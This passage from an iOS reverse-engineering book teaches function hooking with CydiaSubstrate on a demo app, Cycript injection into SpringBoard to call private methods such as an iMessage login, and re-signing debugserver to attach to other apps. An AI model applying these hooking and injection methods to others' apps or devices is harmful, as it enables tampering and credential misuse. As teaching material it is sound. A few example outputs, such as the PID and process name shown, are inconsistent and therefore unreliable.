3.7   Conclusion 
This chapter focuses on 4 tools, which are class -dump, Theos, Reveal and IDA. Familiarity 
with them is the prerequisite of iOS reverse engineering.  
 
  
98  
iOS toolkit 
 
 
In chapter 3, we’ ve introduced the OSX toolkit for iOS reverse engineering. To get our 
work done, we still need to install and configure several tools on iOS to combine both 
platforms. All operations in this chapter are finished on iPhone 5, iOS 8.1, if you encounter any 
problems, please talk to us on http://bbs.iosre.com. 
4.1   CydiaSubstrate 
  
Figure 4- 1 Logo of CydiaSubstrate  
CydiaSubstrate (as shown in figure 4 -1) is the infrastructure of most tweaks. It consists of 
MobileHooker, MobileLoader and Safe mode.  
4.1.1   MobileHooker  
MobileHooker is used to replace system calls, or namely, hook. There are two major 
functions: 
void MSHookMessageEx(Class  class, SEL selector,  IMP replacement,  IMP *result);  
void MSHookFunction(void*  function,  void* replacement,  void** p_original);   
MSHookMessageEx works on Objective -C methods. It calls method_setImplementation to 
replace the original implementation of [class selector] with “replacement ”. What exactly does 
this mean? For example, if we send the message hasSuffix: to an NSString object  (i.e, call 
[NSString hasSuffix:]), in normal situation, this method ’s implementation is to indicate whether 
an NSString object has a certain suffix. But if we change this implementation with the 
implementation of hasPrefix:, then after an NSString object receives hasSuffix: message, it 
4 
  
 
99 actually verifies whether an NSString object has a certain prefix. Isn ’t it easy to understand?  
Logos syntax, which we ’ve introduced in chapter 3, is actually an encapsulation of 
MSHookMessageEx. Although Logos is clean and elegant, while making it easy to write 
Objective -C hooks, it ’s still based on MSHookMessageEx. For Objective -C hooks, we 
recommend using Logos instead of MSHookMessageEx. If you are interested in the use of 
MSHookMessageEx, you can take a look at its offic ial document, or Google “cydiasubstrate 
fuchsiaexample ”, the link starting with “http://www.cydiasubstrate.com “ is what you are 
looking for.  
MSHookFunction is used for C/C++ hooks, and works in assembly level. Conceptually, 
when the process is about to call “function ”, MSHookFunction makes it execute “replacement ” 
instead, and allocate some memory to store the original “function ” and its return  address, 
making it possible for the process to execute “function ” optionally, and guarantees the process 
can run as usual after executing “replacement ”. 
Maybe it ’s hard to understand the above paragraph, so here comes an example. Let ’s take a 
look at figure 4- 2.  
  
Figure 4-  2 Normal execution flow of a process  
As shown in figure 4 -2, a process executes some instructions, then calls function A, and 
afterward executes the remaining instructions. If we hook function A and replace it with function B, then this process’  execution flow changes to figure 4 -3. 

 
100   
Figure 4-  3 Replace Function A with B  
We can see in figure 4 -3 that this process executes some instructions at first, but then calls 
function B at where it ’s supposed to call function A, with function A  stored elsewhere. Inside 
function B, it ’s up to you whether and when to call function A. After function B finishes 
execution, the process will continue to execute the remaining instructions.  
There ’s one more thing to notice. MSHookFunction has a requirement on the length of the 
function it hooks, the total length of all its instructions must be bigger than 8 bytes (This 
number is not officially acknowledged). So here comes the question, how to hook these less -
than -8-byte short functions?  
One workaround is hooking functions inside the short functions. The reason why a function 
is short is often because it calls other functions and they ’re doing the actual job. Some of the 
other functions are long enough to be hooked, so we can choose these functions to be 
MSHookFunction ’s targets, then do some logical judgements in “replacement ” to tell if the 
short function is the caller. If we can make sure the short function is calling the “replacement ”, 
then we can write our modification to the short function ri ght inside “replacement ”. 
If you are still confused about MSHookFunction, here is a simple example. To be honest,  
this example contains too much low -level knowledge, hence is quite hard for beginners to 
understand. Don’ t worry if you happen to be a newbie, just skip to section 4.1.2. When you 
encounter a similar situation later in practice, review this section and you ’ll know what we ’re 

 
101 talking about. Anyway, welcome to http://bbs.iosr e.com  for further discussion.  
Follow me:  
1.   Create iOSRETargetApp with Theos. The commands are as follows:  
snakeninnys- MacBook:Code snakeninny$ /opt/theos/bin/nic.pl 
NIC 2.0 - New Instance Creator 
------------------------------  
  [1.] iphone/application  
  [2.] iphone/library  
  [3.] iphone/preference_bundle  
  [4.] iphone/tool  
  [5.] iphone/tweak  
Choose a Template  (required):  1 
Project Name (required):  iOSRETargetApp  
Package Name [com.yourcompany.iosretargetapp]:  com.iosre.iosretargetapp  
Author/Maintainer  Name [snakeninny]:  snakeninny  
Instantiating  iphone/application  in iosretargetapp/...  
Done. 
2.   Modify RootViewController.mm as follows: 
#import "RootViewController.h"  
 
class CPPClass  
{ 
 public: 
  void CPPFunction(const  char *); 
}; 
 
void CPPClass::CPPFunction(const  char *arg0) 
{ 
 for (int i = 0; i < 66; i++) // This for loop makes this function  long enough to 
validate  MSHookFunction  
 { 
  u_int32_t  randomNumber;  
  if (i % 3 == 0) randomNumber  = arc4random_uniform(i);  
  NSProcessInfo  *processInfo  = [NSProcessInfo  processInfo];  
  NSString  *hostName  = processInfo.hostName;  
  int pid = processInfo.processIdentifier;  
  NSString  *globallyUniqueString  = processInfo.globallyUniqueString;  
  NSString  *processName  = processInfo.processName;  
  NSArray *junks = @[hostName,  globallyUniqueString,  processName];  
  NSString  *junk = @""; 
  for (int j = 0; j < pid; j++) 
  { 
   if (pid % 6 == 0) junk = junks[j % 3]; 
  } 
  if (i % 68 == 1) NSLog(@"Junk:  %@", junk); 
 } 
 NSLog(@"iOSRE:  CPPFunction:  %s", arg0); 
} 
 
extern "C" void CFunction(const  char *arg0) 
{ 
 for (int i = 0; i < 66; i++) // This for loop makes this function  long enough to 
validate  MSHookFunction  
 
102  { 
  u_int32_t  randomNumber;  
  if (i % 3 == 0) randomNumber  = arc4random_uniform(i);  
  NSProcessInf o *processInfo  = [NSProcessInfo  processInfo];  
  NSString  *hostName  = processInfo.hostName;  
  int pid = processInfo.processIdentifier;  
  NSString  *globallyUniqueString  = processInfo.globallyUniqueString;  
  NSString  *processName  = processInfo.processName;  
  NSArray *junks = @[hostName,  globallyUniqueString,  processName];  
  NSString  *junk = @""; 
  for (int j = 0; j < pid; j++) 
  { 
   if (pid % 6 == 0) junk = junks[j % 3]; 
  } 
  if (i % 68 == 1) NSLog(@"Junk:  %@", junk); 
 } 
 NSLog(@"iOSRE:  CFunction:  %s", arg0); 
} 
 
extern "C" void ShortCFunction(const  char *arg0) // ShortCFunction  is too short to be 
hooked 
{ 
 CPPClass  cppClass;  
 cppClass.CPPFunction(arg0);  
} 
 
@implementation  RootViewController  
- (void)loadView  { 
 self.view  = [[[UIView  alloc] initWithFrame:[[UISc reen mainScreen]  
applicationFrame]]  autorelease];  
 self.view.backgroundColor  = [UIColor  redColor];  
} 
 
- (void)viewDidLoad  
{ 
 [super viewDidLoad];  
 
 CPPClass  cppClass;  
 cppClass.CPPFunction("This  is a C++ function!");  
 CFunction("This  is a C function!");  
 ShortCFunction("This  is a short C function!");  
} 
@end 
We’ve written a CPPClass::CPPFunction, a CFunction, and a ShortCFunction as our 
hooking targets. Here, we’ ve intentionally added some useless code in CPPClass::CPPFunction 
and CFuntion for the purpose of increasing the length of these two functions  to validate 
MSHookFunction. However, MSHookFunction will fail on ShortCFunction because of its short 
length, and we have a plan B for this situation.  
3.   Modify Makefile and install the tweak:  
export THEOS_DEVI CE_IP = iOSIP 
export ARCHS = armv7 arm64 
export TARGET = iphone:clang:latest:8.0  
 
103  
include theos/makefiles/common.mk  
 
APPLICATION_NAME  = iOSRETargetApp  
iOSRETargetApp_FILES  = main.m iOSRETargetAppApplication.mm  RootViewController.mm  
iOSRETargetApp_FRAMEWORKS  = UIKit CoreGraphics  
 
include $(THEOS_MAKE_PATH)/application.mk  
 
after-install::  
 install.exec  "su mobile -c uicache"  
In the above code, “su mobile - C uicache ” is used to refresh the UI cache of SpringBoard so 
that iOSRETargetApp’ s icon can be shown on SpringBoard. Run “make package install ” in 
Terminal to install this tweak on the device. Launch iOSRETargetApp, ssh into iOS after the red 
background shows, and s ee whether it outputs as expected:  
FunMaker -5:~ root# grep iOSRE: /var/log/syslog  
Nov 18 11:13:34  FunMaker -5 iOSRETargetApp[5072]:  iOSRE: CPPFunction:  This is a C++ 
function!  
Nov 18 11:13:34  FunMaker -5 iOSRETargetApp[5072]:  iOSRE: CFunction:  This is a C function!  
Nov 18 11:13:35  FunMaker -5 iOSRETargetApp[5072]:  iOSRE: CPPFunction:  This is a short C 
function!  
4.   Create iOSREHookerTweak with Theos, the commands are as follows:  
snakeninnys- MacBook:Code snakeninny$ /opt/theos/bin/nic.pl 
NIC 2.0 - New Instance Creator 
------------------------------  
  [1.] iphone/application  
  [2.] iphone/library  
  [3.] iphone/preference_bundle  
  [4.] iphone/tool  
  [5.] iphone/tweak  
Choose a Template  (required):  5 
Project Name (required):  iOSREHookerTweak  
Package Name [com.yourco mpany.iosrehookertweak]:  com.iosre.iosrehookertweak  
Author/Maintainer  Name [snakeninny]:  snakeninny  
[iphone/tweak]  MobileSubstrate  Bundle filter [com.apple.springboard]:  
com.iosre.iosretargetapp  
[iphone/tweak]  List of applications  to terminate  upon installation  (space-separated,  '-' 
for none) [SpringBoard]:  iOSRETargetApp  
Instantiating  iphone/tweak  in iosrehookertweak/...  
Done. 
5.   Modify Tweak.xm as follows: 
#import <substrate.h>  
 
void (*old__ZN8CPPClass11CPPFunctionEPKc)(void  *, const char *); 
 
void new__ZN8CPPClass11CPPFunctionEPKc(void  *hiddenThis,  const char *arg0) 
{ 
 if (strcmp(arg0,  "This is a short C function!")  == 0) 
old__ZN8CPPClass11CPPFunctionEPKc(hiddenThis,  "This is a hijacked  short C function  from 
new__ZN8CPPClass11CPPFunctionEPKc!");  
 
104  else old__ZN8CPPClass11CPPFunctionEPKc(hiddenThis,  "This is a hijacked  C++ 
function!");  
} 
 
void (*old_CFunction)(const  char *); 
 
void new_CFunction(const  char *arg0) 
{ 
 old_CFunction("This  is a hijacked  C function!");  // Call the original  CFunction  
} 
 
void (*old_ShortCFunction)(const  char *); 
 
void new_ShortCFunction(const  char *arg0) 
{ 
 old_CFunction("This  is a hijacked  short C function  from new_ShortCFunction!");  // 
Call the original  ShortCFunction  
} 
 
%ctor 
{ 
 @autoreleasepool  
 { 
  MSImageRef  image = 
MSGetImageByName("/Applications/iOSRETargetApp.app/iOSRETargetApp");  
  void *__ZN8CPPClass11CPPFunctionEPKc  = MSFindSymbol(image,  
"__ZN8CPPClass11CPPFunctionEPKc");  
  if (__ZN8CPPClass11CPPFunctionEPKc)  NSLog(@"iOSRE:  Found CPPFunction!");  
  MSHookFunction ((void *)__ZN8CPPClass11CPPFunctionEPKc,  (void 
*)&new__ZN8CPPClass11CPPFunctionEPKc,  (void **)&old__ZN8CPPClass11CPPFunctionEPKc);  
 
  void *_CFunction  = MSFindSymbol(image,  "_CFunction");  
  if (_CFunction)  NSLog(@"iOSRE:  Found CFunction!");  
  MSHookFunctio n((void *)_CFunction,  (void *)&new_CFunction,  (void 
**)&old_CFunction);  
 
  void *_ShortCFunction  = MSFindSymbol(image,  "_ShortCFunction");  
  if (_ShortCFunction)  NSLog(@"iOSRE:  Found ShortCFunction!");  
  MSHookFunction((void  *)_ShortCFunction,  (void *)&new_ShortCFunction,  (void 
**)&old_ShortCFunction);  // This MSHookFuntion  will fail because ShortCFunction  is too 
short to be hooked 
 } 
} 
In the above code,  we should pay extra attention to some points:  
•  The use of MSFindSymbol 
Simply put, the role of MSFi ndSymbol is to search the symbol to be hooked. Well, what’ s a 
symbol? 
In computer, the instructions of a function are stored in memory. When the process is going 
to call the function, it needs to know where to locate the function in memory, and then execut es 
its instructions at there. That is to say, the process needs to know the memory address of a 
function according to its name. The mapping of function names and addresses is stored in the 
 
105 “symbol table” . “symbol”  is the name of the function, according to which the process locates the 
function ’s address in memory and then jumps there to execute it.  
Imagine such a scenario: Your App calls a lookup function in a dylib to query information 
on your server. If another A pp gets to know the symbol of “lookup” , then it can import the 
dylib, and call the function as it wishes, causing great consumption of your server resources.  
To avoid this, symbols are divided into 2 types, i.e. public symbols and private symbols 
(Besides, there are stripped symbols, but they have little to do with this chapter. If you are 
interested in stripped symbols, please visit the following reference links or google by 
yourselves). Private symbols are not property of yours, you can not make use of th em as you 
wish. That ’s to say, MSHookFunction will fail on private symbols without further manipulation. 
So saurik provides the MSFindSymbol function to access private symbols. If the concept of 
symbol is still beyond comprehension, just keep the following  code pattern in mind:  
MSImageRef  image = 
MSGetImageByName("/path/to/binary/who/contains/the/implementation/of/symbol");  
void *symbol = MSFindSymbol(image,  "symbol");  
The parameter of MSGetImageByName is “The full path of the binary which contains the 
implementation of the function ”. For example, the implementation of NSLog is in the 
Foundation framework, so the parameter should be 
“/System/Library/Frameworks/Foundation.framework/Foundation ”. Get it? 
You can refer to the official document at 
http://www. cydiasubstrate.com/api/c/MSFindSymbol/ for a more detailed explanation of 
MSFindSymbol. As for the types and definition of symbols, please read http://msdn.microsoft.com/en -us/library/windows/hardware/ff553493(v=vs.85).Aspx and 
http://en.wikibooks.org/wiki /Reverse_Engineering /Mac_OS_X#Symbols_Types.  
•  The origin of a symbol 
You may have already noticed that, the functions we defined in RootViewController.mm 
were CPPClass:: CPPFunction, CFunction and ShortCFunction. How did they change into 
__ZN8CPPClass11CPP FunctionEPKc, _CFunction and _ShortCFunction respectively in 
Tweak.xm? In brief, that was because the compiler “mangled ” (changed) the function name. It ’s 
unnecessary here for us to know how every name is mangled, we are only concerned with the 
results. Wh ere does these 3 underline prefixed symbols come from? In reverse engineering,  
normally we don ’t have the right to access the source code of our targets, so these symbols are 
 
106 all extracted via IDA, as illustrated in this example.  
Drag and drop iOSRETargetApp’ s binary into IDA. The Functions window after initial 
analysis is shown in figure 4 -4. 
  
Figure 4-  4 Functions window  
As we can see, CPPClass::CPPFunction(char const*), _CFunction and _ShortCFunction are 
listed here. Double click “CPPClass:: CPPFunction(char const*) ” to go to its implementation, as 
shown in figure 4 -5. 
  
Figure 4-  5  CPPClass::CPPFunction(char const*)  
The underline prefixed string in line 4 is exactly the symbol we ’re looking for. In the same 
way, where _CFunction and _ShortCFunction come from is obviously shown in figure 4 -6 and 
figure 4 -7. 

 
107   
Figure 4-  6 CFunction  
  
Figure 4-  7 ShortCFunction  
This approach of symbol locating applies to all kinds of symbols. In the beginning stage, we 
suggest you keep in mind that a symbol and its corresponding function name are different, while 
ignore the hows and whys. During your whole process of studying reverse engineering, the 
concept of symbol will imperceptibly goes into your knowledge system, thus there is no need to 
push it for now. 
•  The writing pattern of MSHookFunction 
The 3 parameters of MSHookFunction are: the original function to be hooked/replaced, the 
replacement function, and the original function saved by MobileHooker. Just like Sherlock 
Holmes needs Dr. Watson ’s assi stance, MSHookFunction doesn ’t work alone, it only functions 
with a conventional writing pattern, shown as follows:  
#import <substrate.h>  
 
returnType  (*old_symbol)(args);  
 
returnType  new_symbol(args)  
{ 
 // Whatever  
} 

 
108  
void InitializeMSHookFunction(void)  // This function  is often called in %ctor i.e. 
constructor  
{ 
 MSImageRef  image = 
MSGetImageByName("/path/to/binary/who/contains/the/implementation/of/symbol");  
 void *symbol = MSFindSymbol(image,  "symbol");  
 if (symbol)  MSHookFunction((void  *)symbol,  (void *)&new_ symbol, (void **)&old_  
symbol);  
 else NSLog(@"Symbol  not found!");  
} 
You’ ll recognize this pattern if you review Tweak.xm in iOSREHookerTweak. Again, we 
cannot get the source code of the function to hook, so we don ’t know the prototype of the 
function: What is the returnType? How many args are there and what ’re their types? At this 
moment, we need the help of more advanced reverse engineering skills to reconstruct the 
prototype of the function. Chapter 6 focuses on this knowledge, so don ’t worry if you can ’t 
catch up for now. I strongly suggest you review this section after finishing chapter 6, I bet you will get a better understanding at that time.  
6.   Modify Makefile and install the tweak: 
export THEOS_DEVICE_IP  = iOSIP 
export ARCHS = armv7 arm64 
export TARGET = iphone:clang:latest:8.0  
 
include theos/makefiles/common.mk  
 
TWEAK_NAME  = iOSREHookerTweak  
iOSREHookerTweak_FILES  = Tweak.xm  
 
include $(THEOS_MAKE_PATH)/tweak.mk  
 
after-install::  
 install.exec  "killall  -9 iOSRETargetApp"  
Now please relaunch  iOSRETargetApp and see if the output matches our expectation:  
FunMaker- 5:~ root# grep iOSRE: /var/log/syslog 
Nov 18 11:29:14 FunMaker- 5 iOSRETargetApp[5327]: iOSRE: Found CPPFunction! 
Nov 18 11:29:14  FunMaker -5 iOSRETargetApp[5327]:  iOSRE: Found CFunctio n! 
Nov 18 11:29:14  FunMaker -5 iOSRETargetApp[5327]:  iOSRE: Found ShortCFunction!  
Nov 18 11:29:14  FunMaker -5 iOSRETargetApp[5327]:  iOSRE: CPPFunction:  This is a hijacked  
C++ function!  
Nov 18 11:29:14  FunMaker -5 iOSRETargetApp[5327]:  iOSRE: CFunction:  This is a hijacked  C 
function!  
Nov 18 11:29:14  FunMaker -5 iOSRETargetApp[5327]:  iOSRE: CPPFunction:  This is a hijacked  
short C function  from new__ZN8CPPClass11CPPFunctionEPKc!  
It is worth mentioning that, we failed hooking the short function (i.e. ShortCFuncti on), 
otherwise it would print “ This is a hijacked short C function from new_ShortCFunction! ”. But 
we succeeded in hooking other functions (i.e. CPPClass::CPPFunction) inside the short 
 
109 function. We could tell if the caller was ShortCFuncation by judging the callee ’s argument, thus 
indirectly hooked short function and met our needs. The introduction of MSHookFunction 
above covers almost every situation a beginner may encounter. Since Theos only provides 
encapsulation for MSHookMessageEx, thorough understandin g of the use of MSHookFunction 
is particularly important. If MSHookFunction still confuses you, get to us on http://bbs.iosre.com. 
4.1.2   MobileLoader  
The role of MobileLoader is to load third -party dylibs. When iOS launches, launchd will 
load MobileLoader into m emory, then MobileLoader will call dlopen according to tweaks ’ plist 
filters to load dylibs under /Library/MobileSubstrate/DynamicLibraries/ into different processes. The format of the plist filter here has been explained in details in the previous Theos 
section, which saves my words here. For most rookie iOS reverse engineers, MobileLoader 
works transparently, knowing the existence of it is enough.  
4.1.3   Safe mode  
iOS crashes when tweak sucks. A tweak is essentially a dylib residing in another process, 
once some thing goes wrong in it, the entire process crashes. If it unfortunately happens to be 
SpringBoard or other system processes, tweak crash leads to a system paralysis. So 
CydiaSubstrate introduces Safe Mode: It captures SIGTRAP, SIGABRT, SIGILL, SIGBUS, 
SIGSEGV and SIGSYS signals, then enter safe mode, as shown in figure 4 -8. 
 
110   
Figure 4-  8 Safe mode  
In safe mode, all third -party tweaks that base on CydiaSubstrate will be disabled for 
troubleshooting. But safe mode can ’t guarantee absolute safety, in many cases, devices fail to 
boot because of problematic third -party dylibs. In this situation, you can perform a hard reboot 
by pressing and holding the home and lock buttons, then completely disable CydiaSubstrate by 
holding the volume “+” button. After iOS successfully reboots, you can start error checking. 
When the problems are fixed, reboot iOS again to enable CydiaSubstrate.  

 
111 4.2   Cycript  
  
Figure 4-  9 Cycript  
Cycript (As shown in figure 4 -9) is a scripting language developed by saurik. You can view 
Cycript as Objective -JavaScript. A lot of you may not be familiar with JavaScript, then 
subconsciously think Cycript is very obscure. In fact, I, as a lazy learner, do not know JavaScript 
either, so in a long time, I ’ve ignored Cycr ipt deliberately. It wasn ’t until not long ago when I 
was playing with MTerminal during my company ’s boring meeting and tested a few Objective -
C methods in Cycript, then I had a new awareness of this simple yet powerful language. In fact, 
for Objective -C programmers, scripting languages are not difficult to use, as long as we 
overcome our fear of difficulty, we will be able to handle them very quickly, and Cycript is no exception. Cycript has the convenience of scripting language, you can even write App in 
Cycript, but saurik himself said, “This isn ’t quite ‘ready for primetime’ ”. In my humble opinion, 
the most practical usage of Cycript is testing private methods in an easy manner, possessing 
both safety and efficiency. Therefore, this book will only use Cycript to test methods. For its 
complete manual, please visit the official website http://www.cycript.org.  
We can launch Cycript either in MTerminal or via ssh. Input “cycript ” and it outputs “cy#”, 
which indicates Cycript ’s successful launch.  
FunMaker -5:~ root# cycript    
cy# 

 
112 After that, you can start coding. Instead of writing Apps, we mainly use Cycript to test 
methods, so we need to inject and run code in an existing process. Let ’s exit Cycript by pressing 
“control + D ” for now. Generally speaking, which process to inject depends on wha t methods 
we’re testing: Suppose the methods to be tested are from class A, and class A exists in process B, 
then you should inject into process B to test the methods. Stop beating around the bush, let ’s see 
an example to make everything more straightforwa rd. 
If now we want to test the class method +sharedNumberFormatter in class 
PhoneApplication to reconstruct its prototype, we have to inject into the process MobilePhone 
because PhoneApplication only exists in MobilePhone; Similarly, for the instance metho d 
[SBUIController lockFromSource:], we have to inject into SpringBoard; Naturally, for [NSString 
length], we can inject into any process that imports Foundation.framework. Because most of the 
methods we test are private, so the general rules are that if th e methods you ’re testing are from 
a process, inject right into that process; If they ’re from a lib, inject into the processes that import 
this lib.  
Testing methods via process injection is rather simple. Take SpringBoard for an example, 
first we need to find out its process name or process ID (PID):  
FunMaker -5:~ root# ps -e | grep SpringBoard  
 4567 ??         0:27.45 /System/Library/CoreServices/SpringBoard.app/SpringBoard  
 4634 ttys000    0:00.01 grep SpringBoard  
As we can see, SpringBoard ’s PID is 4634. Input “cycript - p 4634”  or “cycript - p 
SpringBoard”  to inject Cycript into SpringBoard. Now Cycript has been injected into 
SpringBoard and we can start method testing.  
UIAlertView is a most frequently used UI class on iOS. Only 3 lines of code in Objective -C 
are needed for a popup:  
UIAlertView *alertView = [[UIAlertView alloc] initWithTitle:@"iOSRE" 
message:@"snakeninny" delegate:nil cancelButtonTitle:@"OK" otherButtonTitles:nil]; 
[alertView  show]; 
[alertView  release];  
It’s easy to convert  the above Objective- C code into Cycript code:  
FunMaker -5:~ root# cycript -p SpringBoard  
cy# alertView  = [[UIAlertView  alloc] initWithTitle:@"iOSRE"  message:@"snakeninny"  
delegate:nil  cancelButtonTitle:@"OK"  otherButtonTitles:nil]  
#"<UIAlertView:  0x1700e58 0; frame = (0 0; 0 0); layer = <CALayer:  0x164146c0>>"  
cy# [alertView  show] 
cy# [alertView  release]  
No need to declare the type of an object, no need to add a semicolon at the end of each line, 
 
113 that’ s Cycript. If a function has a return value, Cycript will print its memory address and 
description in real time, which is very intuitive. After Cycript executes the above code, a popup 
shows on SpringBoard, as shown in figure 4 -10. 
  
Figure 4-  10 Code execution in Cycript  
If we already know the memory address of an object, we can use “#” operator to access the 
object like this: 
cy# [[UIAlertView alloc] initWithTitle:@"iOSRE" message:@"snakeninny" delegate:nil 
cancelButtonTitle:@"OK" otherButtonTitles:nil] 
#"<UIAlertView:  0x166b4fb0;  frame = (0 0; 0 0); layer = <CALayer:  0x16615890>>"  
cy# [#0x166b4fb0  show] 
cy# [#0x166b4fb0  release]  
If we know an object of a certain class exists in the current process but don ’t know its 
memory address, we cannot obtain the object with “#”. Under such circumstance, we can try 
“choose ” out: 
cy# choose(SBScreenShotter)  
[#"<SBScreenShotter:  0x166e0e20>"]  
cy# choose(SBUIController)  
[#"<SBUIController:  0x16184bf0>"]  
“choose ” a class, Cycript returns its objects. This command is so convenient that it doesn ’t 
succeed all the time. When it fails to get you a usable object, you ’re on your own. We ’ll talk 
about how to get our target objects manually in chapter 6, please stay tuned . 
When it comes to testing private methods, a combination of the above Cycript commands 

 
114 would be enough. Let ’s summarize the use of Cycript with an example of logging in to iMessage 
with my Apple ID. First we need to get an instance of iMessage login contr oller: 
FunMaker -5:~ root# cycript -p SpringBoard  
cy# controller  = [CNFRegController  controllerForServiceType:1]  
#"<CNFRegController:  0x166401e0>"  
Then login with my Apple ID:  
cy# [controller beginAccountSetupWithLogin:@"snakeninny@gmail.com"  
password:@"bbs.iosre.com" foundExisting:NO] 
#"IMAccount:  0x166e7b30  [ID: 5A8E19BE -1BC9-476F-AD3B-729997FAA3BC  Service:  
IMService[iMessage]  Login: E:snakeninny@gmail.com  Active: YES LoginStatus:  Connected]"  
This is an equivalent of logging in iMessage as s hown in figure 4- 11. 
  
Figure 4-  11 Log in iMessage  
This method returns a logged in IMAccount, i.e my iMessage account. Then select the 
addresses for sending and receiving iMessages:  
cy# [controller  setAliases:@[@"snakeninny@gmail.com"]  onAccount:#0x166e7b30]  
1 
This is an equivalent of selecting iMessage addresses as shown in figure 4 -12.  

 
115   
Figure 4-  12 Select iMessage addresses  
The return value indicates our correctness by far. Finally, let ’s check if my iMessage account 
is ready to rock!  
cy# [#0x166e7b30  CNFRegSignInComplete]  
1 
1 in number is YES in BOOL. We can start iMessaging others right now.  
Simple and clear, right? No further explanation needed. As the exercise of this section, now 
it’s your turn to convert the above Cycript code into Objective -C code, and write a tweak to 
verify your conversion as well get familiar with Cycript. One last note, remember to change my 
Apple ID to yours.  
4.3   LLDB and debugserver 
4.3.1   Introduction to LLDB  
If IDA  is caliburn, then LLDB is excalibur, they are at roughly the same position in iOS 
reverse engineering. LLDB, a production of Apple, stands for “Low Level Debugger ”. It’s the 
Xcode built -in dynamic debugger supporting C, C++ and Objective -C, working on OSX, iOS 
and the iOS simulator.  
LLDB ’s functionality sums up in 4 points:  

 
116 •  Launch the program under the conditions you specify;  
•  Stop the program under the conditions you specify;  
•  Inspect the internal status of a program when it stops;  
•  Modify the program when it stops, and observe the modification of its execution flow.  
LLDB is a command line tool, it does not have a graphical interface. Its mass output in 
Terminal scares off beginners easily, but once you master the basic commands of LLDB, you ’ll 
be surprise d by its formidable combination with IDA. LLDB runs in OSX, so to debug iOS, we 
need another tool ’s assistance on iOS, which is debugserver.  
4.3.2    Introduction to debugserver  
debugserver runs on iOS. As its name suggests, it plays the role of a server and execu tes the 
commands from LLDB (as a client), then returns the results to LLDB to show to the user. This 
working mode is called “remote debugging” . By default, debugserver is not installed on iOS. We 
need to connect the device to Xcode, configure it to enable debugging in menu Window →
Devices, then debugserver will be installed to “/Developer/usr/bin/ ” on iOS.  
However, because of the lack of task_for_pid permission, the raw debugserver installed by 
Xcode can only debug our own Apps. Debugging our own Apps is no mystery in App 
development, and since we have our own Apps’  source code, there is no need to reverse them. 
It’d only be cool if we can debug other Apps. No worry, here comes the solution. With a little 
hacking, debugserver and LLDB can be used to debug oth er Apps, maximizing their power.  
4.3.3    Configure debugserver  
1.   Help debugserver lose some weight 
Find the corresponding ARM type of your device according to table 4- 1. 
Name  ARM  
iPhone  4s   armv7   
iPhone  5   armv7s  
iPhone  5c   armv7s  
iPhone  5s   arm64   
iPhone  6 Plus    arm64   
iPhone  6   arm64   
 
117 iPad 2   armv7   
iPad mini    armv7   
The New  iPad    armv7   
iPad with Retina  display    armv7s  
iPad Air    arm64   
iPad Air 2   arm64   
iPad mini with Retina  display    arm64   
iPad mini 3   arm64   
iPod touch  5   armv7   
Table 4 -1 iOS 8 Compatible devices  
My device is iPhone 5, its matching ARM type is armv7s. Copy the raw debugserver from 
iOS to “/Users/snakeninny/ ” on OSX.  
snakeninnysiMac:~ snakeninny$ scp root@iOSIP:/Developer/usr/bin/debugserver 
~/debugserver 
Then help it lose some weight:  
snakeninnysiMac:~  snakeninny$  lipo -thin armv7s ~/debugserver  -output ~/debugserver  
Note that you need to change “armv7s”  here to the corresponding ARM type of your 
device.  
2.   Grant task_for_pid permission to debugserver 
Download http://iosre.com/ent.xml to “/Users/snakeninny/ ” on OSX, then run the 
following command:  
snakeninnysiMac:~ snakeninny$ /opt/theos/bin/ldid -Sent.xml debugserver 
Note, there is no space between “-S” and “ ent.xml” . 
If everything goes fine, ldid will take less than 5 seconds to finish its job. But if ldid gets stuck 
and times out, just try another workaround: Download http://iosre.com/ent.plist  to 
“/Users/snakeninny/ ”, then run the following command:  
snakeninnysiMac:~ snakeninny$ codesign -s - --entitlements ent.plist -f debugserver 
3.   Copy the modified debugserver back to iOS 
Copy the modified debugserver to iOS and grant it execute permission with the following 
comman ds: 
snakeninnysiMac:~  snakeninny$  scp ~/debugserver  root@iOSIP:/usr/bin/debugserver  
snakeninnysiMac:~  snakeninny$  ssh root@iOSIP  
 
118 FunMaker -5:~ root# chmod +x /usr/bin/debugserver  
One thing to clarify, the reason we put the modified debugserver under “/usr/ bin/”  instead 
of overriding the original one is because, first, the original debugserver is not writable, we just 
cannot override it; Second, we don ’t need to input full paths to execute commands under 
“/usr/bin/” , just run “debugserver ” wherever you want, and debugserver is ready to roll out.  
4.3.4    Process launching and attaching using debugserver  
2 most commonly used scenarios of debugserver are process launching and attaching. Both 
possess very simple commands:  
debugserver -x backboard IP:port /path/to/executable 
debugserver will launch the specific executable and open the specific port, then wait for 
LLDB ’s connection from IP.  
debugserver IP:port -a "ProcessName" 
debugserver will attach to process with the name “ProcessName”  and open the specific 
port, then wait for LLDB ’s connection  from IP.  
For example:  
FunMaker -5:~ root# debugserver  -x backboard  *:1234 /Applications/MobileSMS.app/MobileSMS    
debugserver -@(#)PROGRAM:debugserver   PROJECT:debugserver -320.2.89  
 for armv7. 
Listening  to port 1234 for a connection  from *... 
The above command will launch MobileSMS and open port 1234, then wait for LLDB ’s 
connection from any IP. And for the following command:  
FunMaker -5:~ root# debugserver  192.168.1.6:1234  -a "MobileSMS"  
debugserver-@(#)PROGRAM:debugserver   PROJECT:debugserver -320.2.89  
 for armv7. 
Attaching  to process MobileNotes...  
Listening  to port 1234 for a connection  from 192.168.1.6...  
debugserver will attach to MobileSMS and open port 1234, then wait for LLDB ’s connection 
from 192.168.1.6.  
If something goes wrong when executing the above commands, such as:  
FunMaker- 5:~ root# debugserver *:1234 -a "MobileSMS" 
dyld: Library not loaded: 
/Developer/Library/PrivateFrameworks/ARMDisassembler.framework/ARMDisassembler  
  Referenced  from: /usr/bin/debugserver  
  Reason: image not found 
Trace/BPT  trap: 5 
It means necessary debugging data under “/Developer/ ” is missing. This is generally 
because we did not enable development mode on this device in Xcode ’s Window →Devices 
 
119 menu. You can fix the issue by re- enabling development mode on this device.  
When you exit debugserver, the process being debugged also exits. The configuration of 
debugserver is over for now, the following operation are performed on LLDB.  
4.3.5    Use LLDB  
Befor e introducing LLDB, we need to know a big bug in the latest LLDB: LLDB (version 
320.x.xx) in Xcode 6 sometimes messes up ARM with THUMB instructions on armv7 and 
armv7s devices, making it impossible to debug. Before the publishing of this book, the bug has  
not been fixed yet. A temporary solution is to download and install Xcode 5.0.x from https://developer.apple.com/downloads/index.action, their built -in LLDB (version 300.x.xx) 
works fine on armv7 and armv7s devices. When you ’re installing the old version of Xcode, 
make sure you install it in a different path from the current Xcode, say 
